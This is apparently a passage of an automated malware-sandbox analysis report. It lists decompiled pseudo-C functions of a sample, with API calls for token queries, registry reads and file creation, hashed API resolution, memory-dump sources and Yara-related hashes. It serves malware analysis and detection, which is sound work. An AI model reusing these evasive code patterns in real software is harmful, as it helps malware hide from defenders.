				void* _t73;
				void* _t74;
				void* _t79;
				long* _t80;

				_t74 = __ecx;
				_t80[7] = 0;
				_t64 = E6E7D306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t64 != 0) {
					 *_t64(_t74, 8,  &(_t80[7]));
				}
				_t55 = _t80;
				 *_t55 = _t80[7];
				_t55[1] = 1;
				if(E6E7CC280(_t55) != 0) {
					L6:
					if(_t80[1] != 0) {
						E6E7CBB44(_t80);
					}
					return 0;
				}
				_t80[6] = 0;
				if(E6E7D306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
					GetTokenInformation(_t80[4], 0x19, 0, 0,  &(_t80[6])); // executed
				}
				_t30 = _t80[6];
				if(_t80[6] != 0) {
					E6E7CF584( &(_t80[3]), _t30);
					_t59 =  &(_t80[3]);
					_t73 = E6E7CF4BC(_t59, 0);
					_t34 = E6E7D306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
					if (_t34 == 0) goto L33;
					 *_t34 =  *_t34 + _t34;
					 *((intOrPtr*)(_t79 + 0x50182444)) =  *((intOrPtr*)(_t79 + 0x50182444)) + _t59;
				} else {
					goto L6;
				}
			}

0x6e7d10b3
0x6e7d10b5
0x6e7d10c4
0x6e7d10c8
0x6e7d10d2
0x6e7d10d2
0x6e7d10d8
0x6e7d10db
0x6e7d10dd
0x6e7d10e8
0x6e7d1122
0x6e7d1127
0x6e7d112c
0x6e7d112c
0x00000000
0x6e7d1131
0x6e7d10f4
0x6e7d1107
0x6e7d1118
0x6e7d1118
0x6e7d111a
0x6e7d1120
0x6e7d113e
0x6e7d1145
0x6e7d114e
0x6e7d115c
0x6e7d1165
0x6e7d1168
0x6e7d116a
0x00000000
0x00000000
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E7D1118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E7D117B

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction ID: d7b7128ddbadfc43d7f9b3bbd02bfccb75acae5ed44a867d0ba160d709673b1b
Opcode Fuzzy Hash: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction Fuzzy Hash: 13411570344243AFE715D9E8EE24BAF76DD9B91704F108878B950CA1B4DB32D84DCB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D57B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E7D57B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6E7D3064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6E7CF828(_a8, _t15);
							if(E6E7D3064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6E7CF4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6e7d57b8
0x6e7d57b9
0x6e7d57bb
0x6e7d57c0
0x6e7d57c7
0x6e7d57cb
0x6e7d57cb
0x6e7d57cb
0x6e7d57cf
0x6e7d5815
0x6e7d5815
0x6e7d57d1
0x6e7d57d1
0x6e7d57d7
0x6e7d57e0
0x6e7d57e3
0x6e7d57fa
0x6e7d580b
0x6e7d580b
0x6e7d580d
0x6e7d5813
0x6e7d581e
0x6e7d5836
0x6e7d5856
0x6e7d5856
0x6e7d5858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d57d7
0x6e7d5860

APIs

RegQueryValueExA.KERNELBASE(?,6E7DD1F8,00000000,?,00000000,00000000,?,?,?,6E7DD1F8,?,6E7D5887,?,00000000,00000000), ref: 6E7D580B
RegQueryValueExA.KERNELBASE(?,6E7DD1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6E7DD1F8,?,6E7D5887,?,00000000), ref: 6E7D5856

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction ID: 18ac8432375179d375f7ccad1f271556ac83302390b8f26747af2f1594a3d18b
Opcode Fuzzy Hash: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction Fuzzy Hash: A011B43020D305EBD610DEA5FE90EABBBDCEF45B64F10882DB49897161EB21E804CB71

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6E7D5B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6E7CD1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6E7CD6D0(__ecx, _t60);
					E6E7CCFF8(_t56,  *_t60);
					E6E7CCFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6E7D62B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6E7D3064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6E7CC26C(_t40);
					if(E6E7CC280(_t40) != 0) {
						_t56[2] = E6E7D35F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6E7D3064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6E7D3698(_t59, 0xff, 8);
						if(E6E7D3064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6e7d5b43
0x6e7d5b45
0x6e7d5b52
0x6e7d5b56
0x6e7d5b5a
0x6e7d5b64
0x6e7d5b6b
0x6e7d5b6b
0x6e7d5b72
0x6e7d5b74
0x6e7d5b79
0x6e7d5b82
0x6e7d5b8a
0x6e7d5b8a
0x6e7d5b7b
0x6e7d5b7d
0x6e7d5b7d
0x6e7d5b79
0x6e7d5b8f
0x6e7d5b9b
0x6e7d5ccc
0x6e7d5c09
0x6e7d5c12
0x6e7d5c13
0x6e7d5c18
0x6e7d5c19
0x6e7d5c0b
0x6e7d5c0d
0x6e7d5c0d
0x6e7d5c2f
0x6e7d5c43
0x6e7d5c31
0x6e7d5c3e
0x6e7d5c40
0x6e7d5c40
0x6e7d5c45
0x6e7d5c4a
0x6e7d5c58
0x6e7d5cc3
0x00000000
0x6e7d5c5a
0x6e7d5c5f
0x6e7d5cac
0x6e7d5cae
0x6e7d5cb0
0x6e7d5cba
0x6e7d5cba
0x6e7d5cb0
0x6e7d5c61
0x6e7d5c6d
0x6e7d5c86
0x6e7d5c88
0x6e7d5c89
0x6e7d5c8a
0x6e7d5c8c
0x6e7d5c8e
0x6e7d5c8f
0x6e7d5c8f
0x00000000
0x6e7d5c92
0x6e7d5ba1
0x6e7d5bb1
0x6e7d5bb1

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3344a120d283d39d99faa620dd234fb8f590db94c61f95932fc697eb2b15ab9e
Instruction ID: b06202a1e306299a73a34715eefc5d42a2aaf2abf00919358aa043ea3dd1274f
Opcode Fuzzy Hash: 3344a120d283d39d99faa620dd234fb8f590db94c61f95932fc697eb2b15ab9e
Instruction Fuzzy Hash: 4431F43038430AFFE7502AF56F98F6B769DDB81649F004838FA49951B5EA21991CCB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A526AA, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 37%

			_entry_(void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v36;
				long _v40;
				intOrPtr _v44;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t32;
				int _t40;
				intOrPtr _t46;
				long _t53;
				long _t55;
				intOrPtr* _t56;

				_t57 = __eflags;
				_t27 = _a4;
				 *_t56 = _t27;
				_v20 = _t27;
				_v24 = E00A51ED2(__eflags);
				_t29 = E00A5180B(_t57);
				_v28 = _t29;
				if(_t29 != 0) {
					 *_t56 = _v28;
					_t46 =  *((intOrPtr*)(_v20 + 0x40))();
					_t56 = _t56 - 4;
					_v32 = _t46;
				}
				 *_t56 = _v20;
				_t31 = E00A5200F();
				 *_t56 = _v20;
				_v52 = _t31;
				_t32 = E00A51000(); // executed
				_t53 =  *((intOrPtr*)(_v20 + 0x28));
				_t55 =  *((intOrPtr*)(_t53 + 0x3c));
				_t54 = _t55;
				_t47 = _t53;
				_v56 = _t32;
				_v44 = _t53;
				_v40 = _t55;
				_v48 = _t53;
				if(_t55 != 0) {
					_v48 = _v44 + (_v40 + 0x0000ffff & 0x0000ffff) + 1;
				}
				if( *((short*)(_v48 + 0x5c)) != 3) {
					_t40 = FreeConsole(); // executed
					_v36 = _t40;
				}
				 *_t56 = _v20;
				E00A516D7();
				 *_t56 = _v20; // executed
				E00A52092(_t47, _t54, _t55); // executed
				return 0;
			}

0x00a526aa
0x00a526b3
0x00a526b6
0x00a526b9
0x00a526c1
0x00a526c4
0x00a526cc
0x00a526cf
0x00a526d4
0x00a526da
0x00a526dd
0x00a526e0
0x00a526e0
0x00a5270e
0x00a52711
0x00a52719
0x00a5271c
0x00a5271f
0x00a52727
0x00a5272a
0x00a5272d
0x00a52734
0x00a52736
0x00a52739
0x00a5273c
0x00a5273f
0x00a52742
0x00a52706
0x00a52706
0x00a5276e
0x00a526ea
0x00a526ec
0x00a526ec
0x00a52749
0x00a5274c
0x00a52754
0x00a52757
0x00a52765

APIs

FreeConsole.KERNELBASE ref: 00A526EA

Memory Dump Source

Source File: 00000000.00000002.1191979360.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 5bc3dc01efd124b02a90ec213a0ae008a6a56d00a82085b1391ef8d42dcb6644
Instruction ID: 875aa2e294418af4578cf9f1d5de35a71fc19de8ef49d375d7235bcb428f4197
Opcode Fuzzy Hash: 5bc3dc01efd124b02a90ec213a0ae008a6a56d00a82085b1391ef8d42dcb6644
Instruction Fuzzy Hash: B321FAB5D042198FCB00EFB9C985AAEBBF0FF49311F144829E845A7341E7359988CF95

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D1166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E7D1166(intOrPtr* __eax, void* __ebx, void* __ecx) {
				void* _t20;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t20 + 0x50182444)) =  *((intOrPtr*)(_t20 + 0x50182444)) + __ecx;
			}

0x6e7d1168
0x6e7d116a

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E7D117B

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction ID: 6de6df071d71042f165a8350aa08dec46c600a9739d842376c344d673c44a524
Opcode Fuzzy Hash: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction Fuzzy Hash: A4110A707042835AFB5695E8DE74BAF76589F42700F104875E860D60F4CA26E88DCA62

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6E7D5BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6E7D3064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6E7CC26C(_t24);
					if(E6E7CC280(_t24) != 0) {
						_t33[2] = E6E7D35F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6E7D3064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6E7D3698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6E7D3064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6e7d5be5
0x6e7d5be7
0x6e7d5bfe
0x6e7d5c09
0x6e7d5c12
0x6e7d5c18
0x6e7d5c19
0x6e7d5c0b
0x6e7d5c0d
0x6e7d5c0d
0x6e7d5c2f
0x6e7d5c43
0x6e7d5c31
0x6e7d5c3e
0x6e7d5c40
0x6e7d5c40
0x6e7d5c45
0x6e7d5c4a
0x6e7d5c58
0x6e7d5cc3
0x6e7d5cc6
0x6e7d5c5a
0x6e7d5c5f
0x6e7d5cac
0x6e7d5cb0
0x6e7d5cba
0x6e7d5cba
0x6e7d5cb0
0x6e7d5c61
0x6e7d5c6d
0x6e7d5c72
0x6e7d5c86
0x6e7d5c88
0x6e7d5c89
0x6e7d5c8a
0x6e7d5c8c
0x6e7d5c8e
0x6e7d5c8f
0x6e7d5c8f
0x6e7d5c92
0x6e7d5c92
0x6e7d5be9
0x6e7d5be9
0x6e7d5bf0
0x6e7d5bf0
0x6e7d5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E7D5C3E

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction ID: 09f3a1bc6dabb7f80e3d005c7bd6a5f40c4933f61ae827d3b763dc1d969ae4a3
Opcode Fuzzy Hash: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction Fuzzy Hash: 9701263528420BFFF7501AE56F49F6B774DDB81649F004835B909951A4EF22A45CC721

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6E7D5BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E7D3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E7CC26C(_t24);
				if(E6E7CC280(_t24) != 0) {
					_t34[2] = E6E7D35F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6E7D3064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6E7D3698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6E7D3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e7d5bbd
0x6e7d5bc1
0x6e7d5bc4
0x6e7d5bc7
0x6e7d5c09
0x6e7d5c12
0x6e7d5c18
0x6e7d5c19
0x6e7d5c0b
0x6e7d5c0d
0x6e7d5c0d
0x6e7d5c2f
0x6e7d5c43
0x6e7d5c31
0x6e7d5c3e
0x6e7d5c40
0x6e7d5c40
0x6e7d5c45
0x6e7d5c4a
0x6e7d5c58
0x6e7d5cc3
0x6e7d5cc6
0x6e7d5c5a
0x6e7d5c5f
0x6e7d5cac
0x6e7d5cb0
0x6e7d5cba
0x6e7d5cba
0x6e7d5cb0
0x6e7d5c61
0x6e7d5c6d
0x6e7d5c72
0x6e7d5c86
0x6e7d5c88
0x6e7d5c89
0x6e7d5c8a
0x6e7d5c8c
0x6e7d5c8e
0x6e7d5c8f
0x6e7d5c8f
0x6e7d5c92
0x6e7d5c92
0x6e7d5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E7D5C3E

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction ID: ac12b5898d26eb4416aad330175442c9b504089780d119b2531a869e92d86c9a
Opcode Fuzzy Hash: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction Fuzzy Hash: FB01263138030BFFFA502AE46F09F7B774DCFC1659F004831BA05951A5EA12685DC621

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E7D5BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E7D3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E7CC26C(_t24);
				if(E6E7CC280(_t24) != 0) {
					_t34[2] = E6E7D35F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6E7D3064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6E7D3698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6E7D3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e7d5bd1
0x6e7d5bd8
0x6e7d5bdb
0x6e7d5c09
0x6e7d5c12
0x6e7d5c18
0x6e7d5c19
0x6e7d5c0b
0x6e7d5c0d
0x6e7d5c0d
0x6e7d5c2f
0x6e7d5c43
0x6e7d5c31
0x6e7d5c3e
0x6e7d5c40
0x6e7d5c40
0x6e7d5c45
0x6e7d5c4a
0x6e7d5c58
0x6e7d5cc3
0x6e7d5cc6
0x6e7d5c5a
0x6e7d5c5f
0x6e7d5cac
0x6e7d5cb0
0x6e7d5cba
0x6e7d5cba
0x6e7d5cb0
0x6e7d5c61
0x6e7d5c6d
0x6e7d5c72
0x6e7d5c86
0x6e7d5c88
0x6e7d5c89
0x6e7d5c8a
0x6e7d5c8c
0x6e7d5c8e
0x6e7d5c8f
0x6e7d5c8f
0x6e7d5c92
0x6e7d5c92
0x6e7d5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E7D5C3E

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction ID: f7c0209ee60242e432f8e4c60cc08fe50026320f51b46eca470a845ac3867aac
Opcode Fuzzy Hash: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction Fuzzy Hash: 0301453538020BFFF7502AE56F48F7B724ECB81659F004831BA09951E9EE22685CC721

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E7D5BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E7D3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E7CC26C(_t23);
				if(E6E7CC280(_t23) != 0) {
					_t31[2] = E6E7D35F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E7D3064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E7D3698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E7D3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e7d5bb3
0x6e7d5bba
0x6e7d5c09
0x6e7d5c12
0x6e7d5c18
0x6e7d5c19
0x6e7d5c0b
0x6e7d5c0d
0x6e7d5c0d
0x6e7d5c2f
0x6e7d5c43
0x6e7d5c31
0x6e7d5c3e
0x6e7d5c40
0x6e7d5c40
0x6e7d5c45
0x6e7d5c4a
0x6e7d5c58
0x6e7d5cc3
0x6e7d5cc6
0x6e7d5c5a
0x6e7d5c5f
0x6e7d5cac
0x6e7d5cb0
0x6e7d5cba
0x6e7d5cba
0x6e7d5cb0
0x6e7d5c61
0x6e7d5c6d
0x6e7d5c72
0x6e7d5c86
0x6e7d5c88
0x6e7d5c89
0x6e7d5c8a
0x6e7d5c8c
0x6e7d5c8e
0x6e7d5c8f
0x6e7d5c8f
0x6e7d5c92
0x6e7d5c92
0x6e7d5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E7D5C3E

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
